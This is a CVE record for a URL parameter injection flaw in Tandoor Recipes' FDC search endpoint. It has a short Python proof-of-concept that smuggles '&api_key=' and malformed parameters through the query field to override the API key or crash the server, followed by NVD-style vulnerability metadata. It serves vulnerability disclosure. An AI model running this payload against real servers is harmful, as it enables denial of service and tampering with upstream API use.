CVE-2026-33148

import requests target_url = "http://localhost:8000/api/search/fdc/" # Malicious payload injecting an extra parameter # This attempts to override the api_key or cause a DoS malicious_query = "chicken&api_key=invalid&malformed_param=" params = { "query": malicious_query } # Send the request response = requests.get(target_url, params=params) # Check if server crashes or behaves unexpectedly print(f"Status Code: {response.status_code}") if response.status_code == 500: print("Vulnerability confirmed: Server crash triggered.") else: print("Server responded, check response body for parameter injection.")

{"cve": {"id": "CVE-2026-33148", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:17:02.763", "lastModified": "2026-03-30T19:26:49.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. In versions prior to 2.6.0, the FDC (USDA FoodData Central) search endpoint constructs an upstream API URL by directly interpolating the user-supplied `query` parameter into the URL string without URL-encoding. An attacker can inject additional URL parameters by including `&` characters in the query value. This allows overriding the API key, manipulating upstream query behavior, and causing server crashes (HTTP 500) via malformed requests — a Denial of Service condition. Version 2.6.0 patches the issue."}, {"lang": "es", "value": "Tandoor Recipes es una aplicación para gestionar recetas, planificar comidas y crear listas de compras. En versiones anteriores a la 2.6.0, el endpoint de búsqueda de FDC (USDA FoodData Central) construye una URL de API ascendente interpolando directamente el parámetro 'query' proporcionado por el usuario en la cadena de la URL sin codificación URL. Un atacante puede inyectar parámetros URL adicionales incluyendo caracteres '&' en el valor de la consulta. Esto permite anular la clave de la API, manipular el comportamiento de la consulta ascendente y causar caídas del servidor (HTTP 500) a través de solicitudes malformadas — una condición de denegación de servicio. La versión 2.6.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.6.0", "matchCriteriaId": "6EFEDF7D-1D00-4901-A064-ECC168038F6C"}]}]}], "references": [{"url": "https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-43p3-wx6h-9g7w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}